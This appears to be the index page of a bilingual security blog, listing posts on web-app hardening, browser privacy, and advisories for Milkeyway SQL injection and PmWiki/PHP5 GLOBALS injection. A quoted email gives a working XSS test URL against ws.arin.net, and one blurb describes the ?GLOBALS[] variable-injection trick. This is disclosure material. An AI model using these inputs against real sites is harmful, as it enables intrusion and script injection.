This is a collection of resources on the topic. Some of these methods are not bullet proof but will help you develop some proactive security when writing new web applications and when hardening the existing ones.
This is a collection of resources on the topic. Some of these methods are not bullet proof but will help you develop some proactive security when writing new web applications and when hardening the existing ones.
Is seems that Microsoft Internet Explorer 7 with the phishing filter active ping back home for every URL requested. This could be the default in many environments.
Fino a qualche giorno fa, Poste Italiane SPA e il Ministero delle Comunicazioni forniva sui rispettivi siti web l'elenco dei CAP delle localita' italiane gratuitamente e in formato universalmente accessibile.
This is an english translation of "HttpOnly e Firefox" a whitepaper of my friend Stefano Di Paola written in italian.
Versione originale italiana: http://www.wisec.it/sectou.php
WARNING: MASSIVE PR0N USE
Google Maps reversato, questa e' la soluzione del primo LugVR Contest con argomento: reverse di Google Maps. Visita l'articolo di inizio contest per maggiori informazioni. Nota: questo reverse di Google Maps e' stato effettuato da zero, ignorando le altre risorse sull'argomento, che comunque trovate listate a fondo articolo.
Il 7 e' terminato il primo LugVR Contest, argomento: reverse di Google Maps. Interessante vero? Per tutti quelli che si sono stancati di usare le API e l'interfaccia ufficiale. Il prossimo articolo sara' la soluzione del contest.
This is a short email i wrote in reply to v9 AT fakehalo.us on vuln-dev@securityfocus.com focused on how to exploit XSS vulnerabilities in the real world.
Milkeyway is a software for the management and administration of internet access within public structures and frameworks, where the service supplying must be submitted to a scrupulous inspection. Nearly all SQL queries are vulnerable to SQL injection vulnerabilities. There are also some XSS vulnerabilities.
J u a n wrote:
> On 3/3/06, Alexander Hristov <joffer@gmail.com> wrote:
>> Just tested : http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22
>> javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>> it still works for me
> works for me on internet explorer, didn't work with firefox 1.5
The purpose of this article is to make easily understandable the impact of some vulns exposed in the PmWiki Multiple Vulnerabilities and PHP5 Globals Vulnerability advisories.
Some service misuse examples.
PHP5 Globals Vulnerability: with ?GLOBALS[foobar] you can set the value of the un-initialized $foobar variable.
This is both a PmWiki and PHP advisory, and works only with register_globals on. I totally missed the PHP GLOBALS[] GPC injection vulnerability and rediscovered that by my own (if just few month before! arg!). Basically in the worst scenario we are in front of two separate vulnerabilities: one regarding arbitrary remote file inclusion and code execution in PmWiki on PHP 5.x with globals on and the other about the reintroduction of a bug that should have been fixed in 5.0.5 but work (at last) on the 2 most recent version of PHP5.
L'articolo e' una traduzione in italiano di Google XSS Example.
Dnsstuff is a great service often integrated in browser, widget and extension. They offer a number of tests (DNS Report, DNS Timing, WHOIS Lookup, Abuse Lookup, Domain Info, Spam database lookup, Reverse DNS lookup, IPWHOIS Lookup, City From IP, IP Routing Lookup, DNS lookup, Traceroute, Ping, ISP cached DNS lookup) and other conversion/math tools (URL deobfuscator, Free E-mail Lookup, CIDR/Netmask, E-mail Test, CSE HTML Validator, Decimal IPs). When applicable the tool is both ipv4 and ipv6 capable.